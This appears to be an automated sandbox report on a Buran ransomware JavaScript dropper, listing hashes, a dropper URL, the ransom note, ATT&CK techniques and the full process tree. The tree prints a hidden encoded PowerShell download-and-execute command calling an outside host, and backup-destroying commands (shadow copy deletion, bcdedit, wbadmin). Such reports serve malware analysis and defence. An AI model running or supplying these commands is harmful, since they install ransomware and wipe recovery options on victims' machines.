buran | 924b39a646b7ba75fff348033897597b52f1a81af1830beeb279dca1556bd39b

Analysis

max time kernel
155s
max time network
162s
platform
windows10_x64
resource
win10v20210408
submitted
31-08-2021 20:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5613.js
Size

137KB
MD5

220af76150e7b8e51b12c322002d36db
SHA1

b5befee69c32ecaa162808192f3c0f42cde731cd
SHA256

924b39a646b7ba75fff348033897597b52f1a81af1830beeb279dca1556bd39b
SHA512

d540686c0415d11be1bd65e1f55313ee0e0a7bd543eda231188daee9a39aa5c2471b19e730b74a397d5d5826e7c9ee21e86f2168b696c7ff8e5a8b7a261b2328

Score

10^/10

buran persistence ransomware

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://jolantagraban.pl/log/57843441668980/dll/assistant.php

Extracted

Path

C:\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT

Family

buran

Ransom Note

!!! ALL YOUR FILES ARE ENCRYPTED !!! All your files, documents, photos, databases and other important files are encrypted. You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. To be sure we have the decryptor and it works you can send an email: [email protected] and decrypt one file for free. But this file should be of not valuable! Do you really want to restore your files? Write to email: [email protected] Reserved email: [email protected] Reserved email: [email protected] Your personal ID: 287-562-BB8 Attention! * Do not rename encrypted files. * Do not try to decrypt your data using third party software, it may cause permanent data loss. * Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.

Emails

[email protected]

Signatures

Buran
Ransomware-as-a-service based on the VegaLocker family first identified in 2019.
ransomware buran
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow	pid	Process
11	3460	powershell.exe

Executes dropped EXE 3 IoCs

Processes:

JySplzhR.exesvchost.exesvchost.exe

pid	Process
3996	JySplzhR.exe
2116	svchost.exe
1088	svchost.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

JySplzhR.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run	JySplzhR.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\svchost.exe\" -start"	JySplzhR.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

svchost.exe

description	ioc	Process
File opened (read-only)	\??\L:	svchost.exe
File opened (read-only)	\??\K:	svchost.exe
File opened (read-only)	\??\Y:	svchost.exe
File opened (read-only)	\??\X:	svchost.exe
File opened (read-only)	\??\W:	svchost.exe
File opened (read-only)	\??\S:	svchost.exe
File opened (read-only)	\??\Q:	svchost.exe
File opened (read-only)	\??\A:	svchost.exe
File opened (read-only)	\??\P:	svchost.exe
File opened (read-only)	\??\N:	svchost.exe
File opened (read-only)	\??\G:	svchost.exe
File opened (read-only)	\??\F:	svchost.exe
File opened (read-only)	\??\B:	svchost.exe
File opened (read-only)	\??\U:	svchost.exe
File opened (read-only)	\??\O:	svchost.exe
File opened (read-only)	\??\I:	svchost.exe
File opened (read-only)	\??\J:	svchost.exe
File opened (read-only)	\??\H:	svchost.exe
File opened (read-only)	\??\E:	svchost.exe
File opened (read-only)	\??\Z:	svchost.exe
File opened (read-only)	\??\V:	svchost.exe
File opened (read-only)	\??\T:	svchost.exe
File opened (read-only)	\??\R:	svchost.exe
File opened (read-only)	\??\M:	svchost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
12	geoiptool.com

Drops file in Program Files directory 64 IoCs

Processes:

svchost.exe

description	ioc	Process
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql.nl_ja_4.4.0.v20140623020002.jar.kd8eby0.287-562-BB8	svchost.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-openide-text.xml	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019VL_MAK_AE-pl.xrm-ms.kd8eby0.287-562-BB8	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_Subscription3-ul-oob.xrm-ms.kd8eby0.287-562-BB8	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019DemoR_BypassTrial180-ul-oob.xrm-ms	svchost.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.greychart.ui.zh_CN_5.5.0.165303.jar	svchost.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-swing-plaf.jar.kd8eby0.287-562-BB8	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\ORGCHART.CHM.kd8eby0.287-562-BB8	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Fonts\private\GARA.TTF.kd8eby0.287-562-BB8	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\JOURNAL\THMBNAIL.PNG	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RIPPLE\RIPPLE.INF	svchost.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\olh.htm.kd8eby0.287-562-BB8	svchost.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-attach.jar	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\PowerPoint2019R_Grace-ul-oob.xrm-ms.kd8eby0.287-562-BB8	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\PowerPointR_OEM_Perp-ul-oob.xrm-ms.kd8eby0.287-562-BB8	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\EVRGREEN\EVRGREEN.INF.kd8eby0.287-562-BB8	svchost.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\bin\kinit.exe.kd8eby0.287-562-BB8	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Effects\Reflection.eftx	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN111.XML	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BLUECALM\THMBNAIL.PNG.kd8eby0.287-562-BB8	svchost.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_fr.jar.kd8eby0.287-562-BB8	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\PersonalR_OEM_Perp-ul-oob.xrm-ms	svchost.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-api-caching_ja.jar.kd8eby0.287-562-BB8	svchost.exe
File created	C:\Program Files\Microsoft Office\root\Office16\BORDERS\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\DEEPBLUE\DEEPBLUE.ELM.kd8eby0.287-562-BB8	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Document Themes 16\Retrospect.thmx.kd8eby0.287-562-BB8	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp2-ul-phn.xrm-ms	svchost.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_hu.jar.kd8eby0.287-562-BB8	svchost.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\ct.sym.kd8eby0.287-562-BB8	svchost.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-masterfs-nio2.xml.kd8eby0.287-562-BB8	svchost.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-openide-options.jar.kd8eby0.287-562-BB8	svchost.exe
File opened for modification	C:\Program Files\SubmitDebug.mpeg2.kd8eby0.287-562-BB8	svchost.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\bin\javapackager.exe	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\bwcapitalized.dotx	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Templates\1033\TimeCard.xltx.kd8eby0.287-562-BB8	svchost.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach.ja_5.5.0.165303.jar	svchost.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-javahelp_ja.jar.kd8eby0.287-562-BB8	svchost.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-modules-options-keymap.xml	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_Trial-pl.xrm-ms	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\PersonalPipcR_Grace-ppd.xrm-ms.kd8eby0.287-562-BB8	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Word2019VL_KMS_Client_AE-ppd.xrm-ms	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\NewComment.png.kd8eby0.287-562-BB8	svchost.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT	svchost.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.syntheticnotification.exsd	svchost.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-heapdump.xml.kd8eby0.287-562-BB8	svchost.exe
File created	C:\Program Files\Microsoft Office\root\Office16\MSIPC\vi\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT	svchost.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-editor-mimelookup-impl.jar.kd8eby0.287-562-BB8	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\OutlookVL_MAK-ul-oob.xrm-ms.kd8eby0.287-562-BB8	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019VL_MAK_AE-pl.xrm-ms	svchost.exe
File created	C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\en\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT	svchost.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.browser.jdp_5.5.0.165303.jar.kd8eby0.287-562-BB8	svchost.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation_1.2.100.v20131119-0908.jar	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalPipcR_Grace-ul-oob.xrm-ms.kd8eby0.287-562-BB8	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_OEM_Perp2-ppd.xrm-ms	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioStdXC2RVL_KMS_ClientC2R-ul.xrm-ms	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN075.XML	svchost.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ru.txt.kd8eby0.287-562-BB8	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdXC2RVL_KMS_ClientC2R-ul-oob.xrm-ms.kd8eby0.287-562-BB8	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectProO365R_Subscription-pl.xrm-ms	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioStdO365R_SubTrial-pl.xrm-ms.kd8eby0.287-562-BB8	svchost.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification.zh_CN_5.5.0.165303.jar.kd8eby0.287-562-BB8	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Consolas-Verdana.xml	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected]	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\rsod\osm.x-none.msi.16.x-none.boot.tree.dat.kd8eby0.287-562-BB8	svchost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Interacts with shadow copies 2 TTPs 2 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

vssadmin.exevssadmin.exe

pid	Process
2532	vssadmin.exe
1916	vssadmin.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

JySplzhR.exe

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	JySplzhR.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	JySplzhR.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid	Process
3460	powershell.exe
3460	powershell.exe
3460	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exeJySplzhR.exeWMIC.exeWMIC.exevssvc.exe

description	pid	Process
Token: SeDebugPrivilege	3460	powershell.exe
Token: SeDebugPrivilege	3996	JySplzhR.exe
Token: SeDebugPrivilege	3996	JySplzhR.exe
Token: SeIncreaseQuotaPrivilege	2132	WMIC.exe
Token: SeSecurityPrivilege	2132	WMIC.exe
Token: SeTakeOwnershipPrivilege	2132	WMIC.exe
Token: SeLoadDriverPrivilege	2132	WMIC.exe
Token: SeSystemProfilePrivilege	2132	WMIC.exe
Token: SeSystemtimePrivilege	2132	WMIC.exe
Token: SeProfSingleProcessPrivilege	2132	WMIC.exe
Token: SeIncBasePriorityPrivilege	2132	WMIC.exe
Token: SeCreatePagefilePrivilege	2132	WMIC.exe
Token: SeBackupPrivilege	2132	WMIC.exe
Token: SeRestorePrivilege	2132	WMIC.exe
Token: SeShutdownPrivilege	2132	WMIC.exe
Token: SeDebugPrivilege	2132	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2132	WMIC.exe
Token: SeRemoteShutdownPrivilege	2132	WMIC.exe
Token: SeUndockPrivilege	2132	WMIC.exe
Token: SeManageVolumePrivilege	2132	WMIC.exe
Token: 33	2132	WMIC.exe
Token: 34	2132	WMIC.exe
Token: 35	2132	WMIC.exe
Token: 36	2132	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3504	WMIC.exe
Token: SeSecurityPrivilege	3504	WMIC.exe
Token: SeTakeOwnershipPrivilege	3504	WMIC.exe
Token: SeLoadDriverPrivilege	3504	WMIC.exe
Token: SeSystemProfilePrivilege	3504	WMIC.exe
Token: SeSystemtimePrivilege	3504	WMIC.exe
Token: SeProfSingleProcessPrivilege	3504	WMIC.exe
Token: SeIncBasePriorityPrivilege	3504	WMIC.exe
Token: SeCreatePagefilePrivilege	3504	WMIC.exe
Token: SeBackupPrivilege	3504	WMIC.exe
Token: SeRestorePrivilege	3504	WMIC.exe
Token: SeShutdownPrivilege	3504	WMIC.exe
Token: SeDebugPrivilege	3504	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3504	WMIC.exe
Token: SeRemoteShutdownPrivilege	3504	WMIC.exe
Token: SeUndockPrivilege	3504	WMIC.exe
Token: SeManageVolumePrivilege	3504	WMIC.exe
Token: 33	3504	WMIC.exe
Token: 34	3504	WMIC.exe
Token: 35	3504	WMIC.exe
Token: 36	3504	WMIC.exe
Token: SeBackupPrivilege	2108	vssvc.exe
Token: SeRestorePrivilege	2108	vssvc.exe
Token: SeAuditPrivilege	2108	vssvc.exe
Token: SeIncreaseQuotaPrivilege	3504	WMIC.exe
Token: SeSecurityPrivilege	3504	WMIC.exe
Token: SeTakeOwnershipPrivilege	3504	WMIC.exe
Token: SeLoadDriverPrivilege	3504	WMIC.exe
Token: SeSystemProfilePrivilege	3504	WMIC.exe
Token: SeSystemtimePrivilege	3504	WMIC.exe
Token: SeProfSingleProcessPrivilege	3504	WMIC.exe
Token: SeIncBasePriorityPrivilege	3504	WMIC.exe
Token: SeCreatePagefilePrivilege	3504	WMIC.exe
Token: SeBackupPrivilege	3504	WMIC.exe
Token: SeRestorePrivilege	3504	WMIC.exe
Token: SeShutdownPrivilege	3504	WMIC.exe
Token: SeDebugPrivilege	3504	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3504	WMIC.exe
Token: SeRemoteShutdownPrivilege	3504	WMIC.exe
Token: SeUndockPrivilege	3504	WMIC.exe

Suspicious use of WriteProcessMemory 49 IoCs

Processes:

wscript.execmd.exepowershell.exeJySplzhR.exesvchost.execmd.execmd.execmd.exe

description	pid	Process	procid_target
PID 580 wrote to memory of 3948	580	wscript.exe	75
PID 580 wrote to memory of 3948	580	wscript.exe	75
PID 3948 wrote to memory of 3460	3948	cmd.exe	77
PID 3948 wrote to memory of 3460	3948	cmd.exe	77
PID 3460 wrote to memory of 3996	3460	powershell.exe	80
PID 3460 wrote to memory of 3996	3460	powershell.exe	80
PID 3460 wrote to memory of 3996	3460	powershell.exe	80
PID 3996 wrote to memory of 2116	3996	JySplzhR.exe	82
PID 3996 wrote to memory of 2116	3996	JySplzhR.exe	82
PID 3996 wrote to memory of 2116	3996	JySplzhR.exe	82
PID 3996 wrote to memory of 752	3996	JySplzhR.exe	83
PID 3996 wrote to memory of 752	3996	JySplzhR.exe	83
PID 3996 wrote to memory of 752	3996	JySplzhR.exe	83
PID 3996 wrote to memory of 752	3996	JySplzhR.exe	83
PID 3996 wrote to memory of 752	3996	JySplzhR.exe	83
PID 3996 wrote to memory of 752	3996	JySplzhR.exe	83
PID 2116 wrote to memory of 1864	2116	svchost.exe	84
PID 2116 wrote to memory of 1864	2116	svchost.exe	84
PID 2116 wrote to memory of 1864	2116	svchost.exe	84
PID 2116 wrote to memory of 2208	2116	svchost.exe	85
PID 2116 wrote to memory of 2208	2116	svchost.exe	85
PID 2116 wrote to memory of 2208	2116	svchost.exe	85
PID 2116 wrote to memory of 516	2116	svchost.exe	86
PID 2116 wrote to memory of 516	2116	svchost.exe	86
PID 2116 wrote to memory of 516	2116	svchost.exe	86
PID 2116 wrote to memory of 3356	2116	svchost.exe	87
PID 2116 wrote to memory of 3356	2116	svchost.exe	87
PID 2116 wrote to memory of 3356	2116	svchost.exe	87
PID 2116 wrote to memory of 908	2116	svchost.exe	94
PID 2116 wrote to memory of 908	2116	svchost.exe	94
PID 2116 wrote to memory of 908	2116	svchost.exe	94
PID 2116 wrote to memory of 2288	2116	svchost.exe	89
PID 2116 wrote to memory of 2288	2116	svchost.exe	89
PID 2116 wrote to memory of 2288	2116	svchost.exe	89
PID 2116 wrote to memory of 1088	2116	svchost.exe	90
PID 2116 wrote to memory of 1088	2116	svchost.exe	90
PID 2116 wrote to memory of 1088	2116	svchost.exe	90
PID 908 wrote to memory of 2532	908	cmd.exe	97
PID 908 wrote to memory of 2532	908	cmd.exe	97
PID 908 wrote to memory of 2532	908	cmd.exe	97
PID 1864 wrote to memory of 3504	1864	cmd.exe	98
PID 1864 wrote to memory of 3504	1864	cmd.exe	98
PID 1864 wrote to memory of 3504	1864	cmd.exe	98
PID 2288 wrote to memory of 2132	2288	cmd.exe	99
PID 2288 wrote to memory of 2132	2288	cmd.exe	99
PID 2288 wrote to memory of 2132	2288	cmd.exe	99
PID 2288 wrote to memory of 1916	2288	cmd.exe	102
PID 2288 wrote to memory of 1916	2288	cmd.exe	102
PID 2288 wrote to memory of 1916	2288	cmd.exe	102

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\5613.js
1⤵
- Suspicious use of WriteProcessMemory
PID:580
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBqAG8AbABhAG4AdABhAGcAcgBhAGIAYQBuAC4AcABsAC8AbABvAGcALwA1ADcAOAA0ADMANAA0ADEANgA2ADgAOQA4ADAALwBkAGwAbAAvAGEAcwBzAGkAcwB0AGEAbgB0AC4AcABoAHAAIgApAA==
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3948
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBqAG8AbABhAG4AdABhAGcAcgBhAGIAYQBuAC4AcABsAC8AbABvAGcALwA1ADcAOAA0ADMANAA0ADEANgA2ADgAOQA4ADAALwBkAGwAbAAvAGEAcwBzAGkAcwB0AGEAbgB0AC4AcABoAHAAIgApAA==
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3460
  - - C:\Users\Admin\AppData\Local\Temp\JySplzhR.exe
      "C:\Users\Admin\AppData\Local\Temp\JySplzhR.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Modifies system certificate store
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3996
    - - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe" -start
        5⤵
        Executes dropped EXE
        Enumerates connected drives
        Suspicious use of WriteProcessMemory
        
        PID:2116
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1864
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic shadowcopy delete
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3504
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
        6⤵
        
        PID:2208
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
        6⤵
        
        PID:516
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
        6⤵
        
        PID:3356
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2288
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic shadowcopy delete
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2132
        
        C:\Windows\SysWOW64\vssadmin.exe
        
        vssadmin delete shadows /all /quiet
        7⤵
        Interacts with shadow copies
        
        PID:1916
      - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe" -agent 0
        6⤵
        Executes dropped EXE
        Drops file in Program Files directory
        
        PID:1088
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:908
        
        C:\Windows\SysWOW64\vssadmin.exe
        
        vssadmin delete shadows /all /quiet
        7⤵
        Interacts with shadow copies
        
        PID:2532
    - - C:\Windows\SysWOW64\notepad.exe
        
        notepad.exe
        5⤵
        
        PID:752

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2108

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

File Deletion

T1107

Install Root Certificate

T1130

Modify Registry

T1112

Web Service

T1102

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3F26ED5DE6B4E859CCCA6035ECB8D9CB

MD5
bc382383b6c90d20dba3f58aa0f40ade

SHA1
b626e4d049d88702236910b302c955eecc8c7d5f

SHA256
